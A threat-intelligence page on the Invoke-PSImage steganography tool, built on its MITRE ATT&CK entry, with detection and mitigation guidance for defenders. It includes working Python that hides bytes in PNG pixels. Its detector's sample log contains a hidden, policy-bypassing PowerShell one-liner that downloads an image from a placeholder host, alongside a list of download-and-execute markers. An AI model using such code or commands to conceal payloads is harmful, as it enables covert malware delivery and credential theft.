S0231: Invoke-PSImage
Invoke-PSImage takes a PowerShell script and embeds the bytes of the script into the pixels of a PNG image. It generates a one-liner for executing either from a file or from the web. An example of usage is embedding the PowerShell code from the Invoke-Mimikatz module into an image file. By calling the image file from a macro, for example, the macro will download the picture and execute the PowerShell code, which in this case will dump the passwords. [1]
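The embedding step the description refers to, shown as an added illustration that is not Invoke-PSImage's own code: payload bytes are written into the low four bits of two colour channels of successive pixels, the result is a standards-conformant PNG with valid chunk CRCs, and a reader that knows the layout recovers the bytes exactly. The nibble layout, the 64x64 gradient cover and the sample text are assumptions chosen for the demo and are not claimed to match the tool's encoding. The point for defenders is that signature and image-validity checks pass while the per-channel change never exceeds 15 of 255; nothing here executes the payload, which is a harmless string.

```python
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
WIDTH, HEIGHT = 64, 64  # assumed cover size for the demo


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """One PNG chunk: 4-byte length, type, body, CRC32 over type+body."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def write_png(pixels, width, height) -> bytes:
    """Serialise 8-bit RGB pixels (list of (r, g, b)) as a valid PNG."""
    raw = bytearray()
    for y in range(height):
        raw.append(0)  # filter type 0 (None) for this scanline
        for x in range(width):
            raw.extend(pixels[y * width + x])
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # depth 8, colour type 2 = RGB
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(bytes(raw))) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Parse the PNG written above, verifying every chunk CRC; returns (pixels, width, height)."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, width, height, idat = 8, 0, 0, bytearray()
    while pos < len(data):
        (length,) = struct.unpack(">I", data[pos:pos + 4])
        ctype = data[pos + 4:pos + 8]
        body = data[pos + 8:pos + 8 + length]
        (crc,) = struct.unpack(">I", data[pos + 8 + length:pos + 12 + length])
        if crc != (zlib.crc32(ctype + body) & 0xFFFFFFFF):
            raise ValueError(f"bad CRC in chunk {ctype!r}")
        if ctype == b"IHDR":
            width, height, depth, colour = struct.unpack(">IIBB", body[:10])
            if (depth, colour) != (8, 2):
                raise ValueError("demo reader handles 8-bit RGB only")
        elif ctype == b"IDAT":
            idat.extend(body)
        pos += 12 + length
    raw = zlib.decompress(bytes(idat))
    stride = 1 + width * 3
    pixels = []
    for y in range(height):
        row = raw[y * stride + 1:(y + 1) * stride]  # skip the filter byte
        pixels.extend(tuple(row[x * 3:x * 3 + 3]) for x in range(width))
    return pixels, width, height


def embed(payload: bytes, pixels):
    """Hide payload in the low nibble of R and B of successive pixels (assumed demo layout).
    A 4-byte big-endian length prefix tells the reader where the payload ends."""
    framed = struct.pack(">I", len(payload)) + payload
    if len(framed) > len(pixels):
        raise ValueError("cover image too small for payload")
    out = list(pixels)
    for i, byte in enumerate(framed):
        r, g, b = out[i]
        out[i] = ((r & 0xF0) | (byte >> 4), g, (b & 0xF0) | (byte & 0x0F))
    return out


def extract(pixels) -> bytes:
    """Inverse of embed(): rebuild bytes from the low nibbles of R and B."""
    def byte_at(i):
        r, _, b = pixels[i]
        return ((r & 0x0F) << 4) | (b & 0x0F)
    (length,) = struct.unpack(">I", bytes(byte_at(i) for i in range(4)))
    if 4 + length > len(pixels):
        raise ValueError("no framed payload found")
    return bytes(byte_at(i) for i in range(4, 4 + length))


def cover_image():
    """Constructed gradient cover; no real image file is needed for the demo."""
    return [((x * 4) & 0xFF, (y * 4) & 0xFF, ((x + y) * 2) & 0xFF)
            for y in range(HEIGHT) for x in range(WIDTH)]


def build_carrier(payload: bytes) -> bytes:
    """Cover image with payload embedded, serialised as a valid PNG."""
    return write_png(embed(payload, cover_image()), WIDTH, HEIGHT)


def recover(png: bytes) -> bytes:
    """Re-read the PNG from bytes and pull the payload back out."""
    pixels, _, _ = read_png(png)
    return extract(pixels)


def max_channel_change(payload: bytes) -> int:
    """Largest per-channel difference between cover and carrier: at most 15 of 255."""
    cover, stego = cover_image(), embed(payload, cover_image())
    return max(abs(a - b) for p, q in zip(cover, stego) for a, b in zip(p, q))


if __name__ == "__main__":
    sample = b"Write-Output 'harmless sample text'"  # constructed stand-in for a script; never executed
    png = build_carrier(sample)
    print(len(png), "bytes;", recover(png), "; max channel delta", max_channel_change(sample))
```

Any PNG viewer renders the carrier as an ordinary gradient, and a scanner that only checks the signature, chunk structure and CRCs sees nothing wrong; that is why the detection guidance below keys on execution context rather than on the media file.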
Analyst context for executives and security teams
Invoke-PSImage matters because it turns a script into content hidden inside a PNG image, then supports execution through a compact command line from a local file or the web. For leaders, the practical issue is not the tool itself but the control gap it exposes: trusted-looking media files, macros, and PowerShell activity can combine to bypass simple file-type assumptions and delay recognition of credential-theft or other script-driven activity.
Executive priority
Prioritize this as a validation point for layered defense against stealthy script delivery. Security leaders should ask whether the organization can prove visibility across PowerShell execution, document macro behavior, web retrieval of unusual image content, and downstream credential-access indicators. This is also useful for audit and readiness discussions because it tests whether controls inspect behavior and execution context rather than relying only on file extensions or static allow/block decisions.
Technical view
ATT&CK describes Invoke-PSImage as embedding PowerShell script bytes into PNG pixels and generating a one-liner for execution from a file or web location. The supplied relationships map it to Steganography (T1027.003) and Embedded Payloads (T1027.009), both sub-techniques of Obfuscated Files or Information under Defense Evasion, and identify Sandworm Team as a group that uses the tool. Because the tool object carries no official platform or detection text, SOC and IR validation should focus on the observable chain the description supports: image retrieval or access, macro or script launch context, PowerShell command-line activity, and follow-on behavior consistent with the embedded script being executed.
Likely telemetry
- PowerShell process creation and command-line logging
- PowerShell script block, module, and transcription logs where enabled
- Office or macro-spawned process telemetry, especially child processes launching PowerShell
- Web proxy, DNS, and endpoint network telemetry for image downloads followed by script execution
- Endpoint file telemetry for PNG files accessed shortly before PowerShell execution
Detection direction
- Validate correlations between macro-capable applications or other user-facing processes and PowerShell execution, especially when preceded by image download or file access.
- Tune for suspicious PowerShell one-liners and web-sourced execution patterns while accounting for legitimate administrative PowerShell use.
- Do not rely on image file type alone; the relationship to Steganography and Embedded Payloads means benign-looking media may carry executable content.
- Hunt for process chains where a PNG or web image request is temporally close to PowerShell execution and subsequent credential-access behavior.
- Use the Sandworm Team relationship as threat-intelligence context for prioritization, not as proof of attribution in a local incident.
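One way to implement the correlation these items call for, as an added example that is not part of the original page: Python over constructed JSON-lines telemetry with Sysmon-like field names (the field names, the Office parent list, the command-line markers and the 120-second window are all assumptions to tune locally). It fires only when at least two independent indicators coincide, so a lone administrative `-ExecutionPolicy Bypass` run, or an ordinary image download with no PowerShell follow-on, stays quiet.

```python
import json
from datetime import datetime, timedelta

# Constructed sample telemetry (not real logs): an Office-spawned PowerShell one second after a
# PNG download, an ordinary admin script run 15 minutes after an unrelated image fetch, and a
# plain image file read with no PowerShell follow-on.
SAMPLE_LOG = r"""
{"ts": "2024-03-05T09:14:02Z", "host": "ws01", "user": "alice", "event": "http", "url": "http://cdn.example.test/banner.png"}
{"ts": "2024-03-05T09:14:03Z", "host": "ws01", "user": "alice", "event": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE", "cmdline": "powershell -nop -w hidden -ep bypass -c $i=New-Object System.Drawing.Bitmap((New-Object Net.WebClient).OpenRead('http://cdn.example.test/banner.png'))"}
{"ts": "2024-03-05T09:30:00Z", "host": "ws02", "user": "bob", "event": "http", "url": "http://intranet.example.test/logo.png"}
{"ts": "2024-03-05T09:45:10Z", "host": "ws02", "user": "bob", "event": "process", "image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "parent": "C:\\Windows\\explorer.exe", "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\inventory.ps1"}
{"ts": "2024-03-05T09:46:00Z", "host": "ws03", "user": "carol", "event": "file", "path": "C:\\Users\\carol\\Pictures\\holiday.png"}
"""

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}  # assumed list
POWERSHELL = {"powershell.exe", "pwsh.exe"}
IMAGE_EXT = (".png", ".jpg", ".jpeg", ".gif", ".bmp")
# Assumed generic markers of web-sourced or image-decoding one-liners; tune per environment.
CMDLINE_MARKERS = ("-w hidden", "-windowstyle hidden", "-ep bypass", "-executionpolicy bypass",
                   "-encodedcommand", "system.drawing", "getpixel", "net.webclient",
                   "downloadstring", "downloaddata")
WINDOW = timedelta(seconds=120)  # assumed: how long before the launch an image access still counts


def parse_log(text: str) -> list:
    """Parse JSON lines into dicts with a real datetime, sorted by time."""
    events = []
    for line in text.strip().splitlines():
        ev = json.loads(line)
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    events.sort(key=lambda e: e["ts"])
    return events


def basename(path: str) -> str:
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def find_image_to_powershell_chains(events, window=WINDOW) -> list:
    """Flag PowerShell launches showing at least two of: an Office parent, suspicious
    command-line markers, and an image download or read by the same host+user within the window."""
    alerts = []
    for ev in events:
        if ev["event"] != "process" or basename(ev.get("image", "")) not in POWERSHELL:
            continue
        reasons = []
        parent = basename(ev.get("parent", ""))
        if parent in OFFICE_PARENTS:
            reasons.append(f"spawned by Office process {parent}")
        cmd = ev.get("cmdline", "").lower()
        markers = [m for m in CMDLINE_MARKERS if m in cmd]
        if markers:
            reasons.append("command line has " + ", ".join(markers))
        for prior in events:
            if prior["event"] not in ("http", "file") or prior["host"] != ev["host"] or prior["user"] != ev["user"]:
                continue
            delta = ev["ts"] - prior["ts"]
            target = prior.get("url") or prior.get("path") or ""
            if timedelta(0) <= delta <= window and target.lower().endswith(IMAGE_EXT):
                reasons.append(f"{prior['event']} access to {target} {int(delta.total_seconds())}s earlier")
        if len(reasons) >= 2:
            alerts.append({"ts": ev["ts"].isoformat(), "host": ev["host"], "user": ev["user"], "reasons": reasons})
    return alerts


if __name__ == "__main__":
    print(json.dumps(find_image_to_powershell_chains(parse_log(SAMPLE_LOG)), indent=2))
```

The two-of-three threshold is the tuning knob: raising it to three trades recall for precision, while an environment where Office never legitimately spawns PowerShell can alert on the parent-child pair alone and use the image access only as enrichment.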
Mitigation priorities
- Reduce exposure to macro-driven execution paths where business requirements allow, and harden document handling for untrusted content.
- Constrain and monitor PowerShell use with policy, logging, and least-privilege administration practices appropriate to the environment.
- Ensure web and endpoint controls evaluate execution behavior and parent-child process context, not only file extensions or media types.
- Prioritize credential protection and credential-access monitoring because the official description cites embedding Invoke-Mimikatz as an example use case.
- Test incident response playbooks for cases where payloads are concealed in otherwise ordinary files and attribution is uncertain.
Analyst notes and limits
This take is based on the official ATT&CK tool description, the GitHub external reference, and relationships to Sandworm Team, Steganography, and Embedded Payloads. The most valuable local validation is whether defenders can connect image retrieval, macro or parent-process context, PowerShell execution, and follow-on behavior into a single investigation timeline.
ATT&CK does not provide official detection text, tactics, platforms, aliases, or labels for the Invoke-PSImage tool object. Related techniques list Linux, macOS, and Windows, but the tool itself has no specified platform in the supplied fields, so platform-specific coverage should be confirmed locally before making claims.
How security teams should use this page
Treat this object as behavior context, not an attribution claim. Validate the related groups, software, data sources, and mitigations against official ATT&CK relationships and your own telemetry before making control-coverage decisions.
Techniques used
This mirrors the MITRE pattern of making group, software, campaign, and technique relationships scannable. Relationship notes come from mirrored ATT&CK relationship text when available.
| Domain | ID | Name | Relationship / procedure |
|---|---|---|---|
| Enterprise | T1027.003 | Steganography (sub-technique) | Invoke-PSImage can be used to embed a PowerShell script within the pixels of a PNG file. [1] |
| Enterprise | T1027.009 | Embedded Payloads (sub-technique) | Invoke-PSImage can be used to embed payload data within a new image file. [1] |
Groups, software, and campaigns
G0034: Sandworm Team
Sandworm Team is a destructive threat group that has been attributed to Russia's General Staff Main Intelligence Directorate (GRU) Main Center for Special Technologies (GTsST) military unit 74455.[1][2] This group has been active since at least 2009.[3][4][5][6]
In October 2020, the US indicted six GRU Unit 74455 officers associated with Sandworm Team for the following cyber operations: the 2015 and 2016 attacks against Ukrainian electrical companies and government organizations, the 2017 worldwide NotPetya attack, targeting of the 2017 French presidential campaign, the 2018 Olympic Destroyer attack against the Winter Olympic Games, the 2018 operation against the Organisation for the Prohibition of Chemical Weapons, and attacks against the country of Georgia in 2018 and 2019.[1][2] Some of these were conducted with the assistance of GRU Unit 26165, which is also referred to as APT28.[7]
All related ATT&CK context
Object version and sync metadata
The fields below describe the current mirrored snapshot. When Glexia retains multiple ATT&CK source imports, you can open the table to compare the same object across releases (hashes and MITRE timestamps). For MITRE's own release notes and roadmap, see ATT&CK resources: Updates.
Imported snapshots across ATT&CK releases (1)
| Release | Bundle imported | Object version | Modified | Status | Raw hash |
|---|---|---|---|---|---|
| 19.1 | | 1.1 | | Current bundle | 033c95d2f66d… |
Mirrored ATT&CK source object
The raw object is retained through the mirrored ATT&CK source bundle and object hash. The raw endpoint returns the exact object from the mirrored bundle when available.
External references and citations
MITRE external references are preserved separately from Glexia analysis so citations remain traceable to their original source records.
[1] Adams, B. (2017, December 17). Invoke-PSImage. GitHub. Retrieved April 10, 2018.
[2] MITRE ATT&CK. S0231: Invoke-PSImage.
Source: MITRE ATT&CK®. © 2026 The MITRE Corporation. This work is reproduced and distributed with the permission of The MITRE Corporation. MITRE ATT&CK and ATT&CK are registered trademarks of The MITRE Corporation. Glexia is not affiliated with or endorsed by MITRE.